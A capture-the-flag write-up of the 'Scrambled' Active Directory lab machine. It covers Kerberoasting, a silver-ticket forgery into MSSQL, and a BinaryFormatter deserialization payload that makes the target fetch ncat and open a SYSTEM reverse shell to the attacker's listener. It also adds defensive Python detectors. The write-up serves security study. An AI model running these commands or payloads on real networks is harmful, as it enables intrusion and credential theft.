Scrambled is a Medium Windows Active Directory machine. Enumerating the website hosted on the remote machine, a potential attacker is able to deduce the credentials for the user ksimpson. The website also states that NTLM authentication is disabled, meaning that Kerberos authentication must be used. Accessing the Public share with the credentials of ksimpson, a PDF file states that an attacker retrieved the credentials of an SQL database. This is a hint that there is an SQL service running on the remote machine. Enumerating the normal user accounts, it is found that the account SqlSvc has a Service Principal Name (SPN) associated with it. An attacker can use this information to perform an attack known as Kerberoasting and get the hash of SqlSvc. After cracking the hash and acquiring the credentials for the SqlSvc account, an attacker can perform a silver ticket attack to forge a ticket and impersonate the user Administrator on the remote MSSQL service. Enumeration of the database reveals the credentials for the user MiscSvc, which can be used to enumerate shares; the IT share turns out to be readable. Looking at the files found on the share reveals a .NET application that talks to a service listening on port 4411. Reverse engineering the application reveals that it is using the insecure BinaryFormatter class to transmit data, allowing the attacker to upload their own payload and get code execution as nt authority\system.
```
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-01 14:18:04Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
4411/tcp  open  found?        syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49706/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60880/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
```
Port 4411
Seems to be a custom app, maybe? The service answers a bare TCP connection with a banner:
```
$ telnet 10.10.11.168 4411
Trying 10.10.11.168...
Connected to 10.10.11.168.
Escape character is '^]'.
SCRAMBLECORP_ORDERS_V1.0.3;
```
We'll come back to this later.
HTTP
The user ksimpson is found on the website. Looking at the password reset page, in short, they reset passwords to the username, so ksimpson:ksimpson is worth trying.
SMB (Authenticating Through Kerberos)
Using Kerberos with the FQDN, we check whether the user is valid.
Looking at the shares with smbclient, Public is the only interesting one we can read.
```
$ impacket-smbclient 'scrm.local/ksimpson:ksimpson@dc1.scrm.local' -k -no-pass
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
Type help for list of commands
# use Public
# ls
drw-rw-rw-          0  Thu Nov  4 17:23:19 2021 .
drw-rw-rw-          0  Thu Nov  4 17:23:19 2021 ..
-rw-rw-rw-     630106  Fri Nov  5 12:45:07 2021 Network Security Changes.pdf
```
After grabbing and reading the PDF, we see that there was a previous attack in which the attacker targeted SQL. We will try that soon enough!
Kerberoasting cuz We care!!
Looking up the SPNs in the domain as our user, we find the MSSQL SPNs associated with the sqlsvc account.
```
$ GetUserSPNs.py -dc-host dc1.scrm.local -k 'scrm.local/ksimpson:ksimpson'
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 11:32:02.351452  2025-03-30 19:26:14.609217
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 11:32:02.351452  2025-03-30 19:26:14.609217
```
We can request tickets for these SPNs and then try to crack them, which gives us a cleartext password for the sqlsvc account.
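As an added example (not part of the writeup), here is the defender's side of this step: a check over constructed Windows event 4769 records that flags TGS requests for RC4 tickets against user service accounts, which is what the request above looks like in the DC's Security log. Field names follow the 4769 schema; the events themselves are made up to mirror the scenario.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 data.

Added example, not part of the original writeup. The events are constructed to
mirror the scenario above (ksimpson requesting the MSSQLSvc SPN that belongs to
sqlsvc); field names follow the 4769 event schema.
"""

RC4_HMAC = 0x17  # TicketEncryptionType 0x17 = RC4-HMAC, the etype roasting tools ask for

# Constructed events; on a real DC these come from the Security log.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.7"},
    {"EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "DC1$",
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.14.7"},
    {"EventID": 4769, "TargetUserName": "DC1$@SCRM.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.11.168"},
    {"EventID": 4768, "TargetUserName": "ksimpson", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x17, "IpAddress": "10.10.14.7"},
]


def is_roastable_request(ev):
    """True for a 4769 where a user (not machine) service account was asked for an RC4 ticket."""
    if ev.get("EventID") != 4769:
        return False
    svc = ev["ServiceName"]
    # Machine accounts end in '$' and krbtgt is the KDC itself; neither is a roasting target.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev["TicketEncryptionType"] == RC4_HMAC


def find_kerberoasting(events):
    """Group suspicious requests by (requesting principal, source IP) -> [service accounts]."""
    hits = {}
    for ev in events:
        if is_roastable_request(ev):
            hits.setdefault((ev["TargetUserName"], ev["IpAddress"]), []).append(ev["ServiceName"])
    return hits
```

A service account that has no AES etypes enabled in msDS-SupportedEncryptionTypes will be issued RC4 tickets to legitimate clients too, so treat a hit as a lead; the durable fix is AES-only for the account and a long random password.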
Silver Ticket Attacks
MSSQL is running under the sqlsvc account whose password we now have, so we can forge a silver ticket for that service and connect as the Administrator of the instance.
```
[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20241024.90011.835e1755-py3.11.egg/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: Administrator.ccache
[+] SPN MSSQLSVC/:1433@SCRM.LOCAL not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for MSSQL/@SCRM.LOCAL
[+] Using TGS from cache
[+] Changing sname from MSSQL/@SCRM.LOCAL to MSSQLSVC/:1433@SCRM.LOCAL and hoping for the best
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
```
Winner Winner SQL Dinner!!!
MSSQL (Through the Looking Glass)
We can look through the database real quick to see if anything interesting is lying around.
```
SQL (SCRM\administrator dbo@master)> select name from sys.databases;
name
----------
master
tempdb
model
msdb
ScrambleHR
SQL (SCRM\administrator dbo@master)> use ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator dbo@ScrambleHR)> select name from sys.tables;
name
----------
Employees
```
```
$ impacket-smbclient 'scrm.local/MiscSvc:<SNIP>@dc1.scrm.local' -k -no-pass
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
Type help for list of commands
# use IT
# ls
drw-rw-rw-          0  Wed Nov  3 14:32:55 2021 .
drw-rw-rw-          0  Wed Nov  3 14:32:55 2021 ..
drw-rw-rw-          0  Wed Nov  3 16:06:32 2021 Apps
drw-rw-rw-          0  Wed Nov  3 14:32:44 2021 Logs
drw-rw-rw-          0  Wed Nov  3 14:32:55 2021 Reports
# cd Apps
# ls
drw-rw-rw-          0  Wed Nov  3 16:06:32 2021 .
drw-rw-rw-          0  Wed Nov  3 16:06:32 2021 ..
drw-rw-rw-          0  Fri Nov  5 15:57:08 2021 Sales Order Client
# cd Sales Order Client
# ls
drw-rw-rw-          0  Fri Nov  5 15:57:08 2021 .
drw-rw-rw-          0  Fri Nov  5 15:57:08 2021 ..
-rw-rw-rw-      86528  Fri Nov  5 15:57:08 2021 ScrambleClient.exe
-rw-rw-rw-      19456  Fri Nov  5 15:57:08 2021 ScrambleLib.dll
# mget *
```
Dnspying
After copying the files to our Windows VM we can look at them in dnSpy.
From there we can load both the exe and the dll. The dll, ScrambleLib, holds the library code the client uses. Inside it we find a class that reveals a certain username we can use to bypass authentication.
Upon connecting with the domain we get the dashboard. Other tabs show a way to create a new order. We can enable debug logging from Tools so we get an output file we can read. Let's try to create an order and look at the output.
Making sense of the output
We see that we are sending data to the server as LIST_ORDERS;. Base64 and deserialization are also in use, specifically BinaryFormatter. Near the bottom we see UPLOAD_ORDER; followed by base64. If we remember from the very beginning, there was a service on port 4411 that answered our connection with a banner.
Back to Suite 4411 with Deserialization
We can use ysoserial to encode our payloads. First we set up a Python web server hosting ncat.
Linux VM:

```
$ telnet 10.10.11.168 4411
Trying 10.10.11.168...
Connected to 10.10.11.168.
Escape character is '^]'.
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////<SNIP>
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
SESSION_TIMED_OUT;
```
So we got the target to fetch ncat. Now we do the same thing again, this time executing ncat, and once we do we get a shell back.
```
$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.168] 50224
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
```
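As an added defensive example (not code from the writeup or from the ScrambleCorp application), here is a small Python parser for the line protocol shown in the telnet session above that recognises a BinaryFormatter stream by its serialization header, which is the check a server-side filter or an IDS rule would key on. The frame layout and banner are taken from the page; all traffic in the block is constructed.

```python
"""Spot BinaryFormatter (NRBF) streams inside SCRAMBLECORP_ORDERS frames.
Added example, not the page's or the application's code. Frame layout
('VERB;payload') and banner come from the session above; all traffic here is
constructed, and the UPLOAD_ORDER body is a bare header plus filler, no gadget chain.
"""
import base64
import binascii
import struct

# An NRBF stream opens with a SerializationHeaderRecord (MS-NRBF 2.6.1): record type
# 0x00 then four little-endian int32s: RootId, HeaderId, MajorVersion (1), MinorVersion (0).
# With RootId 1 and HeaderId -1 the first nine bytes, 00 01 00 00 00 FF FF FF FF,
# base64 to "AAEAAAD/////", the prefix seen in the captured UPLOAD_ORDER above.
HEADER_LEN = 17

def parse_nrbf_header(raw):
    """Return the header fields if raw looks like an NRBF stream, else None."""
    if len(raw) < HEADER_LEN or raw[0] != 0x00:
        return None
    root_id, header_id, major, minor = struct.unpack_from("<iiii", raw, 1)
    if major != 1 or minor != 0:
        return None
    return {"RootId": root_id, "HeaderId": header_id, "MajorVersion": major, "MinorVersion": minor}

def classify_frame(line):
    """Split 'VERB;payload' and label the payload 'text', 'base64' or 'nrbf'."""
    verb, _, payload = line.strip().partition(";")
    if not payload:
        return verb, "text"
    try:
        raw = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return verb, "text"
    return verb, "nrbf" if parse_nrbf_header(raw) else "base64"

def flagged_frames(lines):
    """Indexes of UPLOAD_ORDER frames carrying an NRBF stream; a server or IDS should reject them."""
    return [i for i, line in enumerate(lines) if classify_frame(line) == ("UPLOAD_ORDER", "nrbf")]

# Constructed traffic mirroring the session above.
FAKE_STREAM = bytes([0x00]) + struct.pack("<iiii", 1, -1, 1, 0) + b"\x0b"
UPLOAD_FRAME_B64 = base64.b64encode(FAKE_STREAM).decode()
SAMPLE_LINES = [
    "SCRAMBLECORP_ORDERS_V1.0.3;",
    "LIST_ORDERS;",
    "UPLOAD_ORDER;" + UPLOAD_FRAME_B64,
    "UPLOAD_ORDER;" + base64.b64encode(b'{"order":1}').decode(),
]
```

The real fix is on the server: stop deserializing client input with BinaryFormatter, which Microsoft documents as unsafe for untrusted data, and move to a format with an explicit schema; a header check like this is only a detection hook or stop-gap.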